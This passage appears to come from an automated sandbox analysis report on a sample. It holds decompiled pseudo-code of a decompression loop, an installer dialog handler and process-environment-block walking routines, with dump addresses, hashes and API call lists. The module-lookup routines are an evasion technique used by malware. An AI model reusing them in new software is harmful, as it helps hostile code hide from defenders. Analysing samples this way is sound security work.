                                                                                        										_v36 =  &(_t284[1]);
                                                                                        									}
                                                                                        									_a6 = _t208;
                                                                                        								} else {
                                                                                        									_a4 = 0xc0;
                                                                                        								}
                                                                                        								_t286 = 1 << _v8 - _t186;
                                                                                        								_t244 = _v12 >> _t186;
                                                                                        								while(_t244 < _v40) {
                                                                                        									 *(_t168 + _t244 * 4) = _a4;
                                                                                        									_t244 = _t244 + _t286;
                                                                                        								}
                                                                                        								_t287 = _v12;
                                                                                        								_t246 = 1 << _v44;
                                                                                        								while((_t287 & _t246) != 0) {
                                                                                        									_t287 = _t287 ^ _t246;
                                                                                        									_t246 = _t246 >> 1;
                                                                                        								}
                                                                                        								_t288 = _t287 ^ _t246;
                                                                                        								_v20 = 1;
                                                                                        								_v12 = _t288;
                                                                                        								_t251 = _v16;
                                                                                        								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                                                        									L60:
                                                                                        									if(_v48 != 0) {
                                                                                        										_t282 = _v48;
                                                                                        										_t283 = _t282 - 1;
                                                                                        										_t200 = _a28 + _t186;
                                                                                        										_v48 = _t283;
                                                                                        										_v24 = _t200;
                                                                                        										if(_v8 <= _t200) {
                                                                                        											goto L45;
                                                                                        										}
                                                                                        										goto L31;
                                                                                        									}
                                                                                        									break;
                                                                                        								} else {
                                                                                        									goto L58;
                                                                                        								}
                                                                                        								do {
                                                                                        									L58:
                                                                                        									_t186 = _t186 - _a28;
                                                                                        									_t251 = _t251 - 1;
                                                                                        								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                                                        								_v16 = _t251;
                                                                                        								goto L60;
                                                                                        							}
                                                                                        							L61:
                                                                                        							_v8 = _v8 + 1;
                                                                                        							_v32 = _v32 + 4;
                                                                                        							_v44 = _v44 + 1;
                                                                                        						} while (_v8 <= _v28);
                                                                                        						goto L62;
                                                                                        					}
                                                                                        					_t277 = 0;
                                                                                        					do {
                                                                                        						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                                                        						_t277 = _t277 + 4;
                                                                                        						_t235 = _t235 - 1;
                                                                                        						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                                                        					} while (_t235 != 0);
                                                                                        					goto L21;
                                                                                        				}
                                                                                        				 *_a24 =  *_a24 & 0x00000000;
                                                                                        				 *_a28 =  *_a28 & 0x00000000;
                                                                                        				return 0;
                                                                                        			}











































































                                                                                        0x00407573
                                                                                        0x00407580
                                                                                        0x00407580
                                                                                        0x00407583
                                                                                        0x0040758a
                                                                                        0x0040758d
                                                                                        0x00000000
                                                                                        0x004073b0
                                                                                        0x00407330
                                                                                        0x00407332
                                                                                        0x00407332
                                                                                        0x00407336
                                                                                        0x00407339
                                                                                        0x0040733a
                                                                                        0x0040733a
                                                                                        0x00000000
                                                                                        0x00407332
                                                                                        0x004072a6
                                                                                        0x004072ac
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e205b8326ae89ea7e41b2cb83266b2effedd335e5b54ad7d386a065d8ff2d5ef
                                                                                        • Instruction ID: 0a9d7053db9648894e52107a0598598bb6c65082166a45c8961a79b8daba83ed
                                                                                        • Opcode Fuzzy Hash: e205b8326ae89ea7e41b2cb83266b2effedd335e5b54ad7d386a065d8ff2d5ef
                                                                                        • Instruction Fuzzy Hash: 7AC13831E042199BCF18CF68D8905EEBBB2BF99314F25826AD85677380D734A942CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E6FC24785(void* __eflags, intOrPtr* _a4) {
                                                                                        				intOrPtr* _v8;
                                                                                        				intOrPtr _v12;
                                                                                        				intOrPtr _v16;
                                                                                        				intOrPtr _v20;
                                                                                        				signed int _t35;
                                                                                        
                                                                                        				_v16 =  *[fs:0x30];
                                                                                        				_v12 =  *((intOrPtr*)(_v16 + 0xc));
                                                                                        				_v20 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                        				_v8 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                        				while(E6FC246C9(_t35,  *((intOrPtr*)(_v8 + 0x30)), _a4) != 0) {
                                                                                        					_v8 =  *_v8;
                                                                                        					if(_v8 != _v20) {
                                                                                        						continue;
                                                                                        					}
                                                                                        					return 0;
                                                                                        				}
                                                                                        				return  *((intOrPtr*)(_v8 + 0x28));
                                                                                        			}









                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336002347.000000006FC23000.00000040.00020000.sdmp, Offset: 6FC20000, based on PE: true
                                                                                        • Associated: 00000001.00000002.335954457.000000006FC20000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.335970994.000000006FC21000.00000080.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.335995426.000000006FC22000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.336018479.000000006FC25000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                                                                                        • Instruction ID: 7d04be3fd25cbc945c82bb298f144886edd146dbba66bcebb95b733dd01294a9
                                                                                        • Opcode Fuzzy Hash: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                                                                                        • Instruction Fuzzy Hash: 9E010D79A15218EFCB81DFA9C584A9DBBF4FF09720F118596E814EB721E331AE50DB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E6FC24582() {
                                                                                        
                                                                                        				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
                                                                                        			}



                                                                                        0x6fc24599

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336002347.000000006FC23000.00000040.00020000.sdmp, Offset: 6FC20000, based on PE: true
                                                                                        • Associated: 00000001.00000002.335954457.000000006FC20000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.335970994.000000006FC21000.00000080.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.335995426.000000006FC22000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.336018479.000000006FC25000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                                        • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                                                        • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                                        • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 96%
                                                                                        			E00404CD6(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                                        				struct HWND__* _v8;
                                                                                        				struct HWND__* _v12;
                                                                                        				long _v16;
                                                                                        				signed int _v20;
                                                                                        				signed int _v24;
                                                                                        				intOrPtr _v28;
                                                                                        				signed char* _v32;
                                                                                        				int _v36;
                                                                                        				signed int _v44;
                                                                                        				int _v48;
                                                                                        				signed int* _v60;
                                                                                        				signed char* _v64;
                                                                                        				signed int _v68;
                                                                                        				long _v72;
                                                                                        				void* _v76;
                                                                                        				intOrPtr _v80;
                                                                                        				intOrPtr _v84;
                                                                                        				void* _v88;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				signed int _t203;
                                                                                        				intOrPtr _t206;
                                                                                        				intOrPtr _t207;
                                                                                        				long _t212;
                                                                                        				signed int _t216;
                                                                                        				signed int _t227;
                                                                                        				void* _t230;
                                                                                        				void* _t231;
                                                                                        				int _t237;
                                                                                        				long _t242;
                                                                                        				long _t243;
                                                                                        				signed int _t244;
                                                                                        				signed int _t250;
                                                                                        				signed int _t252;
                                                                                        				signed char _t253;
                                                                                        				signed char _t259;
                                                                                        				void* _t264;
                                                                                        				void* _t266;
                                                                                        				signed char* _t284;
                                                                                        				signed char _t285;
                                                                                        				long _t290;
                                                                                        				signed int _t300;
                                                                                        				signed int _t308;
                                                                                        				signed char* _t316;
                                                                                        				int _t320;
                                                                                        				int _t321;
                                                                                        				signed int* _t322;
                                                                                        				int _t323;
                                                                                        				long _t324;
                                                                                        				signed int _t325;
                                                                                        				long _t327;
                                                                                        				int _t328;
                                                                                        				signed int _t329;
                                                                                        				void* _t331;
                                                                                        
                                                                                        				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                                        				_v8 = GetDlgItem(_a4, 0x408);
                                                                                        				_t331 = SendMessageA;
                                                                                        				_v24 =  *0x42f488;
                                                                                        				_v28 =  *0x42f454 + 0x94;
                                                                                        				_t320 = 0x10;
                                                                                        				if(_a8 != 0x110) {
                                                                                        					L23:
                                                                                        					if(_a8 != 0x405) {
                                                                                        						_t298 = _a16;
                                                                                        					} else {
                                                                                        						_a12 = 0;
                                                                                        						_t298 = 1;
                                                                                        						_a8 = 0x40f;
                                                                                        						_a16 = 1;
                                                                                        					}
                                                                                        					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                        						_v16 = _t298;
                                                                                        						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
                                                                                        							if(( *0x42f45d & 0x00000002) != 0) {
                                                                                        								L41:
                                                                                        								if(_v16 != 0) {
                                                                                        									_t242 = _v16;
                                                                                        									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
                                                                                        										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
                                                                                        									}
                                                                                        									_t243 = _v16;
                                                                                        									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
                                                                                        										_t298 = _v24;
                                                                                        										_t244 =  *(_t243 + 0x5c);
                                                                                        										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
                                                                                        											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
                                                                                        										} else {
                                                                                        											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        								goto L48;
                                                                                        							}
                                                                                        							if(_a8 == 0x413) {
                                                                                        								L33:
                                                                                        								_t298 = 0 | _a8 != 0x00000413;
                                                                                        								_t250 = E00404C24(_v8, _a8 != 0x413);
                                                                                        								_t325 = _t250;
                                                                                        								if(_t325 >= 0) {
                                                                                        									_t99 = _v24 + 8; // 0x8
                                                                                        									_t298 = _t250 * 0x418 + _t99;
                                                                                        									_t252 =  *_t298;
                                                                                        									if((_t252 & 0x00000010) == 0) {
                                                                                        										if((_t252 & 0x00000040) == 0) {
                                                                                        											_t253 = _t252 ^ 0x00000001;
                                                                                        										} else {
                                                                                        											_t259 = _t252 ^ 0x00000080;
                                                                                        											if(_t259 >= 0) {
                                                                                        												_t253 = _t259 & 0x000000fe;
                                                                                        											} else {
                                                                                        												_t253 = _t259 | 0x00000001;
                                                                                        											}
                                                                                        										}
                                                                                        										 *_t298 = _t253;
                                                                                        										E0040117D(_t325);
                                                                                        										_a12 = _t325 + 1;
                                                                                        										_a16 =  !( *0x42f45c) >> 0x00000008 & 0x00000001;
                                                                                        										_a8 = 0x40f;
                                                                                        									}
                                                                                        								}
                                                                                        								goto L41;
                                                                                        							}
                                                                                        							_t298 = _a16;
                                                                                        							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                        								goto L41;
                                                                                        							}
                                                                                        							goto L33;
                                                                                        						} else {
                                                                                        							goto L48;
                                                                                        						}
                                                                                        					} else {
                                                                                        						L48:
                                                                                        						if(_a8 != 0x111) {
                                                                                        							L56:
                                                                                        							if(_a8 == 0x200) {
                                                                                        								SendMessageA(_v8, 0x200, 0, 0);
                                                                                        							}
                                                                                        							if(_a8 == 0x40b) {
                                                                                        								_t230 =  *0x42a89c;
                                                                                        								if(_t230 != 0) {
                                                                                        									ImageList_Destroy(_t230);
                                                                                        								}
                                                                                        								_t231 =  *0x42a8b0;
                                                                                        								if(_t231 != 0) {
                                                                                        									GlobalFree(_t231);
                                                                                        								}
                                                                                        								 *0x42a89c = 0;
                                                                                        								 *0x42a8b0 = 0;
                                                                                        								 *0x42f4c0 = 0;
                                                                                        							}
                                                                                        							if(_a8 != 0x40f) {
                                                                                        								L90:
                                                                                        								if(_a8 == 0x420 && ( *0x42f45d & 0x00000001) != 0) {
                                                                                        									_t321 = (0 | _a16 == 0x00000020) << 3;
                                                                                        									ShowWindow(_v8, _t321);
                                                                                        									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
                                                                                        								}
                                                                                        								goto L93;
                                                                                        							} else {
                                                                                        								E004011EF(_t298, 0, 0);
                                                                                        								_t203 = _a12;
                                                                                        								if(_t203 != 0) {
                                                                                        									if(_t203 != 0xffffffff) {
                                                                                        										_t203 = _t203 - 1;
                                                                                        									}
                                                                                        									_push(_t203);
                                                                                        									_push(8);
                                                                                        									E00404CA4();
                                                                                        								}
                                                                                        								if(_a16 == 0) {
                                                                                        									L75:
                                                                                        									E004011EF(_t298, 0, 0);
                                                                                        									_v36 =  *0x42a8b0;
                                                                                        									_t206 =  *0x42f488;
                                                                                        									_v64 = 0xf030;
                                                                                        									_v24 = 0;
                                                                                        									if( *0x42f48c <= 0) {
                                                                                        										L86:
                                                                                        										if( *0x42f44c == 4) {
                                                                                        											InvalidateRect(_v8, 0, 1);
                                                                                        										}
                                                                                        										_t207 =  *0x42ec1c; // 0x6301d0
                                                                                        										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
                                                                                        											E00404BDF(0x3ff, 0xfffffffb, E00404BF7(5));
                                                                                        										}
                                                                                        										goto L90;
                                                                                        									}
                                                                                        									_t322 = _t206 + 8;
                                                                                        									do {
                                                                                        										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                                                        										if(_t212 != 0) {
                                                                                        											_t300 =  *_t322;
                                                                                        											_v72 = _t212;
                                                                                        											_v76 = 8;
                                                                                        											if((_t300 & 0x00000001) != 0) {
                                                                                        												_v76 = 9;
                                                                                        												_v60 =  &(_t322[4]);
                                                                                        												_t322[0] = _t322[0] & 0x000000fe;
                                                                                        											}
                                                                                        											if((_t300 & 0x00000040) == 0) {
                                                                                        												_t216 = (_t300 & 0x00000001) + 1;
                                                                                        												if((_t300 & 0x00000010) != 0) {
                                                                                        													_t216 = _t216 + 3;
                                                                                        												}
                                                                                        											} else {
                                                                                        												_t216 = 3;
                                                                                        											}
                                                                                        											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
                                                                                        											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                                                        											SendMessageA(_v8, 0x110d, 0,  &_v76);
                                                                                        										}
                                                                                        										_v24 = _v24 + 1;
                                                                                        										_t322 =  &(_t322[0x106]);
                                                                                        									} while (_v24 <  *0x42f48c);
                                                                                        									goto L86;
                                                                                        								} else {
                                                                                        									_t323 = E004012E2( *0x42a8b0);
                                                                                        									E00401299(_t323);
                                                                                        									_t227 = 0;
                                                                                        									_t298 = 0;
                                                                                        									if(_t323 <= 0) {
                                                                                        										L74:
                                                                                        										SendMessageA(_v12, 0x14e, _t298, 0);
                                                                                        										_a16 = _t323;
                                                                                        										_a8 = 0x420;
                                                                                        										goto L75;
                                                                                        									} else {
                                                                                        										goto L71;
                                                                                        									}
                                                                                        									do {
                                                                                        										L71:
                                                                                        										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
                                                                                        											_t298 = _t298 + 1;
                                                                                        										}
                                                                                        										_t227 = _t227 + 1;
                                                                                        									} while (_t227 < _t323);
                                                                                        									goto L74;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                        							goto L93;
                                                                                        						} else {
                                                                                        							_t237 = SendMessageA(_v12, 0x147, 0, 0);
                                                                                        							if(_t237 == 0xffffffff) {
                                                                                        								goto L93;
                                                                                        							}
                                                                                        							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
                                                                                        							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
                                                                                        								_t324 = 0x20;
                                                                                        							}
                                                                                        							E00401299(_t324);
                                                                                        							SendMessageA(_a4, 0x420, 0, _t324);
                                                                                        							_a12 = _a12 | 0xffffffff;
                                                                                        							_a16 = 0;
                                                                                        							_a8 = 0x40f;
                                                                                        							goto L56;
                                                                                        						}
                                                                                        					}
                                                                                        				} else {
                                                                                        					_v36 = 0;
                                                                                        					 *0x42f4c0 = _a4;
                                                                                        					_v20 = 2;
                                                                                        					 *0x42a8b0 = GlobalAlloc(0x40,  *0x42f48c << 2);
                                                                                        					_t264 = LoadImageA( *0x42f440, 0x6e, 0, 0, 0, 0);
                                                                                        					 *0x42a8a4 =  *0x42a8a4 | 0xffffffff;
                                                                                        					_v16 = _t264;
                                                                                        					 *0x42a8ac = SetWindowLongA(_v8, 0xfffffffc, E004052E8);
                                                                                        					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
                                                                                        					 *0x42a89c = _t266;
                                                                                        					ImageList_AddMasked(_t266, _v16, 0xff00ff);
                                                                                        					SendMessageA(_v8, 0x1109, 2,  *0x42a89c);
                                                                                        					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
                                                                                        						SendMessageA(_v8, 0x111b, _t320, 0);
                                                                                        					}
                                                                                        					DeleteObject(_v16);
                                                                                        					_t327 = 0;
                                                                                        					do {
                                                                                        						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
                                                                                        						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
                                                                                        							if(_t327 != 0x20) {
                                                                                        								_v20 = 0;
                                                                                        							}
                                                                                        							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062E0(0, _t327, _t331, 0, _t272)), _t327);
                                                                                        						}
                                                                                        						_t327 = _t327 + 1;
                                                                                        					} while (_t327 < 0x21);
                                                                                        					_t328 = _a16;
                                                                                        					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
                                                                                        					_push(0x15);
                                                                                        					E004042D1(_a4);
                                                                                        					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
                                                                                        					_push(0x16);
                                                                                        					E004042D1(_a4);
                                                                                        					_t329 = 0;
                                                                                        					_v16 = 0;
                                                                                        					if( *0x42f48c <= 0) {
                                                                                        						L19:
                                                                                        						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                                        						goto L20;
                                                                                        					} else {
                                                                                        						_t316 = _v24 + 8;
                                                                                        						_v32 = _t316;
                                                                                        						do {
                                                                                        							_t284 =  &(_t316[0x10]);
                                                                                        							if( *_t284 != 0) {
                                                                                        								_v64 = _t284;
                                                                                        								_t285 =  *_t316;
                                                                                        								_v88 = _v16;
                                                                                        								_t308 = 0x20;
                                                                                        								_v84 = 0xffff0002;
                                                                                        								_v80 = 0xd;
                                                                                        								_v68 = _t308;
                                                                                        								_v44 = _t329;
                                                                                        								_v72 = _t285 & _t308;
                                                                                        								if((_t285 & 0x00000002) == 0) {
                                                                                        									if((_t285 & 0x00000004) == 0) {
                                                                                        										 *( *0x42a8b0 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                                                        									} else {
                                                                                        										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
                                                                                        									}
                                                                                        								} else {
                                                                                        									_v80 = 0x4d;
                                                                                        									_v48 = 1;
                                                                                        									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                                                        									_v36 = 1;
                                                                                        									 *( *0x42a8b0 + _t329 * 4) = _t290;
                                                                                        									_v16 =  *( *0x42a8b0 + _t329 * 4);
                                                                                        								}
                                                                                        							}
                                                                                        							_t329 = _t329 + 1;
                                                                                        							_t316 =  &(_v32[0x418]);
                                                                                        							_v32 = _t316;
                                                                                        						} while (_t329 <  *0x42f48c);
                                                                                        						if(_v36 != 0) {
                                                                                        							L20:
                                                                                        							if(_v20 != 0) {
                                                                                        								E00404306(_v8);
                                                                                        								goto L23;
                                                                                        							} else {
                                                                                        								ShowWindow(_v12, 5);
                                                                                        								E00404306(_v12);
                                                                                        								L93:
                                                                                        								return E00404338(_a8, _a12, _a16);
                                                                                        							}
                                                                                        						}
                                                                                        						goto L19;
                                                                                        					}
                                                                                        				}
                                                                                        			}

                                                                                        0x004052b9
                                                                                        0x004052bf
                                                                                        0x004052d1
                                                                                        0x004052d1
                                                                                        0x00000000
                                                                                        0x0040513b
                                                                                        0x0040513d
                                                                                        0x00405142
                                                                                        0x00405147
                                                                                        0x0040514c
                                                                                        0x0040514e
                                                                                        0x0040514e
                                                                                        0x0040514f
                                                                                        0x00405150
                                                                                        0x00405152
                                                                                        0x00405152
                                                                                        0x0040515a
                                                                                        0x0040519b
                                                                                        0x0040519d
                                                                                        0x004051ad
                                                                                        0x004051b0
                                                                                        0x004051b5
                                                                                        0x004051bc
                                                                                        0x004051bf
                                                                                        0x00405261
                                                                                        0x00405269
                                                                                        0x00405271
                                                                                        0x00405271
                                                                                        0x00405277
                                                                                        0x0040527f
                                                                                        0x00405290
                                                                                        0x00405290
                                                                                        0x00000000
                                                                                        0x0040527f
                                                                                        0x004051c5
                                                                                        0x004051c8
                                                                                        0x004051ce
                                                                                        0x004051d3
                                                                                        0x004051d5
                                                                                        0x004051d7
                                                                                        0x004051dd
                                                                                        0x004051e4
                                                                                        0x004051e9
                                                                                        0x004051f0
                                                                                        0x004051f3
                                                                                        0x004051f3
                                                                                        0x004051fa
                                                                                        0x00405206
                                                                                        0x0040520a
                                                                                        0x0040520c
                                                                                        0x0040520c
                                                                                        0x004051fc
                                                                                        0x004051fe
                                                                                        0x004051fe
                                                                                        0x0040522c
                                                                                        0x00405238
                                                                                        0x00405247
                                                                                        0x00405247
                                                                                        0x00405249
                                                                                        0x0040524c
                                                                                        0x00405255
                                                                                        0x00000000
                                                                                        0x0040515c
                                                                                        0x00405167
                                                                                        0x0040516a
                                                                                        0x0040516f
                                                                                        0x00405171
                                                                                        0x00405175
                                                                                        0x00405185
                                                                                        0x0040518f
                                                                                        0x00405191
                                                                                        0x00405194
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405177
                                                                                        0x00405177
                                                                                        0x0040517d
                                                                                        0x0040517f
                                                                                        0x0040517f
                                                                                        0x00405180
                                                                                        0x00405181
                                                                                        0x00000000
                                                                                        0x00405177
                                                                                        0x0040515a
                                                                                        0x00405135
                                                                                        0x00405078
                                                                                        0x00000000
                                                                                        0x0040508e
                                                                                        0x00405098
                                                                                        0x0040509d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004050af
                                                                                        0x004050b4
                                                                                        0x004050c0
                                                                                        0x004050c0
                                                                                        0x004050c2
                                                                                        0x004050d1
                                                                                        0x004050d3
                                                                                        0x004050d7
                                                                                        0x004050da
                                                                                        0x00000000
                                                                                        0x004050da
                                                                                        0x00405078
                                                                                        0x00404d2c
                                                                                        0x00404d2f
                                                                                        0x00404d32
                                                                                        0x00404d42
                                                                                        0x00404d55
                                                                                        0x00404d60
                                                                                        0x00404d66
                                                                                        0x00404d74
                                                                                        0x00404d87
                                                                                        0x00404d8c
                                                                                        0x00404d97
                                                                                        0x00404da0
                                                                                        0x00404db6
                                                                                        0x00404dc6
                                                                                        0x00404dd2
                                                                                        0x00404dd2
                                                                                        0x00404dd7
                                                                                        0x00404ddd
                                                                                        0x00404ddf
                                                                                        0x00404de2
                                                                                        0x00404de7
                                                                                        0x00404dec
                                                                                        0x00404dee
                                                                                        0x00404dee
                                                                                        0x00404e0e
                                                                                        0x00404e0e
                                                                                        0x00404e10
                                                                                        0x00404e11
                                                                                        0x00404e16
                                                                                        0x00404e1c
                                                                                        0x00404e20
                                                                                        0x00404e25
                                                                                        0x00404e2d
                                                                                        0x00404e31
                                                                                        0x00404e36
                                                                                        0x00404e3b
                                                                                        0x00404e43
                                                                                        0x00404e46
                                                                                        0x00404f15
                                                                                        0x00404f28
                                                                                        0x00000000
                                                                                        0x00404e4c
                                                                                        0x00404e4f
                                                                                        0x00404e52
                                                                                        0x00404e55
                                                                                        0x00404e55
                                                                                        0x00404e5a
                                                                                        0x00404e63
                                                                                        0x00404e66
                                                                                        0x00404e6a
                                                                                        0x00404e6d
                                                                                        0x00404e70
                                                                                        0x00404e79
                                                                                        0x00404e82
                                                                                        0x00404e85
                                                                                        0x00404e88
                                                                                        0x00404e8b
                                                                                        0x00404ec9
                                                                                        0x00404ef4
                                                                                        0x00404ecb
                                                                                        0x00404eda
                                                                                        0x00404eda
                                                                                        0x00404e8d
                                                                                        0x00404e90
                                                                                        0x00404e9e
                                                                                        0x00404ea8
                                                                                        0x00404eb0
                                                                                        0x00404eb7
                                                                                        0x00404ec2
                                                                                        0x00404ec2
                                                                                        0x00404e8b
                                                                                        0x00404efa
                                                                                        0x00404efb
                                                                                        0x00404f07
                                                                                        0x00404f07
                                                                                        0x00404f13
                                                                                        0x00404f2e
                                                                                        0x00404f31
                                                                                        0x00404f4e
                                                                                        0x00000000
                                                                                        0x00404f33
                                                                                        0x00404f38
                                                                                        0x00404f41
                                                                                        0x004052d3
                                                                                        0x004052e5
                                                                                        0x004052e5
                                                                                        0x00404f31
                                                                                        0x00000000
                                                                                        0x00404f13
                                                                                        0x00404e46

                                                                                        APIs
                                                                                        • GetDlgItem.USER32 ref: 00404CED
                                                                                        • GetDlgItem.USER32 ref: 00404CFA
                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D49
                                                                                        • LoadImageA.USER32 ref: 00404D60
                                                                                        • SetWindowLongA.USER32 ref: 00404D7A
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D8C
                                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DA0
                                                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404DB6
                                                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404DC2
                                                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404DD2
                                                                                        • DeleteObject.GDI32(00000110), ref: 00404DD7
                                                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E02
                                                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E0E
                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EA8
                                                                                        • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404ED8
                                                                                          • Part of subcall function 00404306: SendMessageA.USER32(00000028,?,00000001,00404136), ref: 00404314
                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EEC
                                                                                        • GetWindowLongA.USER32 ref: 00404F1A
                                                                                        • SetWindowLongA.USER32 ref: 00404F28
                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404F38
                                                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00405033
                                                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00405098
                                                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 004050AD
                                                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 004050D1
                                                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 004050F1
                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00405106
                                                                                        • GlobalFree.KERNEL32 ref: 00405116
                                                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0040518F
                                                                                        • SendMessageA.USER32(?,00001102,?,?), ref: 00405238
                                                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00405247
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00405271
                                                                                        • ShowWindow.USER32(?,00000000), ref: 004052BF
                                                                                        • GetDlgItem.USER32 ref: 004052CA
                                                                                        • ShowWindow.USER32(00000000), ref: 004052D1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
